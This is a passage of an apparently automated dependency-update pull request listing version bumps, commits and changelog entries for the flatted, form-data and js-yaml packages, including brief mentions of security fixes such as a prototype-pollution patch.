href=\"https://github.com/kpdecker/jsdiff/compare/v5.2.0...v5.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flatted` from 3.3.1 to 3.4.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/3bf09091c3562e17a0647bc06710dd6097079cf7\"\u003e\u003ccode\u003e3bf0909\u003c/code\u003e\u003c/a\u003e 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802\"\u003e\u003ccode\u003e885ddcc\u003c/code\u003e\u003c/a\u003e fix CWE-1321\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/0bdba705d130f00892b1b8fcc80cf4cdea0631e3\"\u003e\u003ccode\u003e0bdba70\u003c/code\u003e\u003c/a\u003e added flatted-view to the benchmark\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/2a02dce7c641dec31194c67663f9b0b12e62da20\"\u003e\u003ccode\u003e2a02dce\u003c/code\u003e\u003c/a\u003e 3.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/fba4e8f2e113665da275b19cd0f695f3d98e9416\"\u003e\u003ccode\u003efba4e8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/WebReflection/flatted/issues/89\"\u003e#89\u003c/a\u003e from WebReflection/python-fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/5fe86485e6df7f7f34a07a2a85498bd3e17384e7\"\u003e\u003ccode\u003e5fe8648\u003c/code\u003e\u003c/a\u003e added \u0026quot;when in Rome\u0026quot; also a test for PHP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/53517adbefe724fe472b2f9ebcdb01910d0ae3f0\"\u003e\u003ccode\u003e53517ad\u003c/code\u003e\u003c/a\u003e some minor improvement\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/b3e2a0c387bf446435fec45ad7f05299f012346f\"\u003e\u003ccode\u003eb3e2a0c\u003c/code\u003e\u003c/a\u003e Fixing recursion issue in Python too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/c4b46dbcbf782326e54ea1b65d3ebb1dc7a23fad\"\u003e\u003ccode\u003ec4b46db\u003c/code\u003e\u003c/a\u003e Add SECURITY.md for security policy and reporting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/f86d071e0f70de5a7d8200198824a3f07fc9c988\"\u003e\u003ccode\u003ef86d071\u003c/code\u003e\u003c/a\u003e Create dependabot.yml for version updates\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/WebReflection/flatted/compare/v3.3.1...v3.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `form-data` from 4.0.1 to 4.0.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/releases\"\u003eform-data's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4\"\u003ev4.0.4\u003c/a\u003e - 2025-07-16\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23 \u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values \u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] fix linting errors \u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] actually ensure the readme backup isn’t published \u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix readme capitalization \u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev4.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.2...v4.0.3\"\u003ev4.0.3\u003c/a\u003e - 2025-06-05\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/577\"\u003e\u003ccode\u003e[#577](https://github.com/form-data/form-data/issues/577)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[eslint] use a shared config \u003ca href=\"https://github.com/form-data/form-data/commit/426ba9ac440f95d1998dac9a5cd8d738043b048f\"\u003e\u003ccode\u003e426ba9a\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix some spacing issues \u003ca href=\"https://github.com/form-data/form-data/commit/20941917f0e9487e68c564ebc3157e23609e2939\"\u003e\u003ccode\u003e2094191\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003ehasown\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/81ab41b46fdf34f5d89d7ff30b513b0925febfaa\"\u003e\u003ccode\u003e81ab41b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method \u003ca href=\"https://github.com/form-data/form-data/commit/8d8e4693093519f7f18e3c597d1e8df8c493de9e\"\u003e\u003ccode\u003e8d8e469\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add tests to check the behavior of \u003ccode\u003egetBoundary\u003c/code\u003e with non-strings \u003ca href=\"https://github.com/form-data/form-data/commit/837b8a1f7562bfb8bda74f3fc538adb7a5858995\"\u003e\u003ccode\u003e837b8a1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused deps \u003ca href=\"https://github.com/form-data/form-data/commit/870e4e665935e701bf983a051244ab928e62d58e\"\u003e\u003ccode\u003e870e4e6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] remove local commit hooks \u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/4066fd6f65992b62fa324a6474a9292a4f88c916\"\u003e\u003ccode\u003e4066fd6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix scripts to use prepublishOnly \u003ca href=\"https://github.com/form-data/form-data/commit/c4bbb13c0ef669916657bc129341301b1d331d75\"\u003e\u003ccode\u003ec4bbb13\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev4.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.1...v4.0.2\"\u003ev4.0.2\u003c/a\u003e - 2025-02-14\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/blob/master/CHANGELOG.md\"\u003eform-data's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.4...v4.0.5\"\u003ev4.0.5\u003c/a\u003e - 2025-11-17\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Tests] Switch to newer v8 prediction library; enable node 24 testing \u003ca href=\"https://github.com/form-data/form-data/commit/16e00765342106876f98a1c9703314006c9e937a\"\u003e\u003ccode\u003e16e0076\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eeslint\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/5822467f0ec21f6ad613c1c90856375e498793c7\"\u003e\u003ccode\u003e5822467\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set Symbol.toStringTag in the proper place \u003ca href=\"https://github.com/form-data/form-data/commit/76d0dee43933b5e167f7f09e5d9cbbd1cf911aa7\"\u003e\u003ccode\u003e76d0dee\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4\"\u003ev4.0.4\u003c/a\u003e - 2025-07-16\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23 \u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values \u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] fix linting errors \u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] actually ensure the readme backup isn’t published \u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix readme capitalization \u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.2...v4.0.3\"\u003ev4.0.3\u003c/a\u003e - 2025-06-05\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/577\"\u003e\u003ccode\u003e[#577](https://github.com/form-data/form-data/issues/577)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[eslint] use a shared config \u003ca href=\"https://github.com/form-data/form-data/commit/426ba9ac440f95d1998dac9a5cd8d738043b048f\"\u003e\u003ccode\u003e426ba9a\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix some spacing issues \u003ca href=\"https://github.com/form-data/form-data/commit/20941917f0e9487e68c564ebc3157e23609e2939\"\u003e\u003ccode\u003e2094191\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003ehasown\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/81ab41b46fdf34f5d89d7ff30b513b0925febfaa\"\u003e\u003ccode\u003e81ab41b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method \u003ca href=\"https://github.com/form-data/form-data/commit/8d8e4693093519f7f18e3c597d1e8df8c493de9e\"\u003e\u003ccode\u003e8d8e469\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add tests to check the behavior of \u003ccode\u003egetBoundary\u003c/code\u003e with non-strings \u003ca href=\"https://github.com/form-data/form-data/commit/837b8a1f7562bfb8bda74f3fc538adb7a5858995\"\u003e\u003ccode\u003e837b8a1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused deps \u003ca href=\"https://github.com/form-data/form-data/commit/870e4e665935e701bf983a051244ab928e62d58e\"\u003e\u003ccode\u003e870e4e6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] remove local commit hooks \u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/4066fd6f65992b62fa324a6474a9292a4f88c916\"\u003e\u003ccode\u003e4066fd6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix scripts to use prepublishOnly \u003ca href=\"https://github.com/form-data/form-data/commit/c4bbb13c0ef669916657bc129341301b1d331d75\"\u003e\u003ccode\u003ec4bbb13\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.1...v4.0.2\"\u003ev4.0.2\u003c/a\u003e - 2025-02-14\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/68ff7dda8834d6de095a7008cef0e03bc252ca98\"\u003e\u003ccode\u003e68ff7dd\u003c/code\u003e\u003c/a\u003e v4.0.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/5822467f0ec21f6ad613c1c90856375e498793c7\"\u003e\u003ccode\u003e5822467\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eeslint\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/76d0dee43933b5e167f7f09e5d9cbbd1cf911aa7\"\u003e\u003ccode\u003e76d0dee\u003c/code\u003e\u003c/a\u003e [Fix] set Symbol.toStringTag in the proper place\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/16e00765342106876f98a1c9703314006c9e937a\"\u003e\u003ccode\u003e16e0076\u003c/code\u003e\u003c/a\u003e [Tests] Switch to newer v8 prediction library; enable node 24 testing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/41996f5ac73a867046d48512cab62e64fc846dad\"\u003e\u003ccode\u003e41996f5\u003c/code\u003e\u003c/a\u003e v4.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e [meta] actually ensure the readme backup isn’t published\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e [meta] fix readme capitalization\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e [meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e [Tests] fix linting errors\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e [Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.1...v4.0.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepublish\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[3.14.2] - 2025-11-15\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackported v4.1.1 fix to v3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.0] - 2021-04-15\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTypes are now exported as \u003ccode\u003eyaml.types.XXX\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEvery type now has \u003ccode\u003eoptions\u003c/code\u003e property with original arguments kept as they were\n(see \u003ccode\u003eyaml.types.int.options\u003c/code\u003e as an example).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eSchema.extend()\u003c/code\u003e now keeps old type order in case of conflicts\n(e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as \u003ccode\u003eabcd\u003c/code\u003e instead of \u003ccode\u003ecbad\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.0] - 2021-01-03\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCheck \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md\"\u003emigration guide\u003c/a\u003e to see details for all breaking changes.\u003c/li\u003e\n\u003cli\u003eBreaking: \u0026quot;unsafe\u0026quot; tags \u003ccode\u003e!!js/function\u003c/code\u003e, \u003ccode\u003e!!js/regexp\u003c/code\u003e, \u003ccode\u003e!!js/undefined\u003c/code\u003e are\nmoved to \u003ca href=\"https://github.com/nodeca/js-yaml-js-types\"\u003ejs-yaml-js-types\u003c/a\u003e package.\u003c/li\u003e\n\u003cli\u003eBreaking: removed \u003ccode\u003esafe*\u003c/code\u003e functions. Use \u003ccode\u003eload\u003c/code\u003e, \u003ccode\u003eloadAll\u003c/code\u003e, \u003ccode\u003edump\u003c/code\u003e\ninstead which are all now safe by default.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.DEFAULT_SAFE_SCHEMA\u003c/code\u003e and \u003ccode\u003eyaml.DEFAULT_FULL_SCHEMA\u003c/code\u003e are removed, use\n\u003ccode\u003eyaml.DEFAULT_SCHEMA\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.Schema.create(schema, tags)\u003c/code\u003e is removed, use \u003ccode\u003eschema.extend(tags)\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e!!binary\u003c/code\u003e now always mapped to \u003ccode\u003eUint8Array\u003c/code\u003e on load.\u003c/li\u003e\n\u003cli\u003eReduced nesting of \u003ccode\u003e/lib\u003c/code\u003e folder.\u003c/li\u003e\n\u003cli\u003eParse numbers according to YAML 1.2 instead of YAML 1.1 (\u003ccode\u003e01234\u003c/code\u003e is now decimal,\n\u003ccode\u003e0o1234\u003c/code\u003e is octal, \u003ccode\u003e1:23\u003c/code\u003e is parsed as string instead of base60).\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e no longer quotes \u003ccode\u003e:\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, \u003ccode\u003e]\u003c/code\u003e, \u003ccode\u003e(\u003c/code\u003e, \u003ccode\u003e)\u003c/code\u003e except when necessary, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/470\"\u003e#470\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/557\"\u003e#557\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eLine and column in exceptions are now formatted as \u003ccode\u003e(X:Y)\u003c/code\u003e instead of\n\u003ccode\u003eat line X, column Y\u003c/code\u003e (also present in compact format), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/332\"\u003e#332\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCode snippet created in exceptions now contains multiple lines with line numbers.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e now serializes \u003ccode\u003eundefined\u003c/code\u003e as \u003ccode\u003enull\u003c/code\u003e in collections and removes keys with\n\u003ccode\u003eundefined\u003c/code\u003e in mappings, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/571\"\u003e#571\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e with \u003ccode\u003eskipInvalid=true\u003c/code\u003e now serializes invalid items in collections as null.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003e!\u003c/code\u003e are now dumped as \u003ccode\u003e!tag\u003c/code\u003e instead of \u003ccode\u003e!\u0026lt;!tag\u0026gt;\u003c/code\u003e, \u003ca 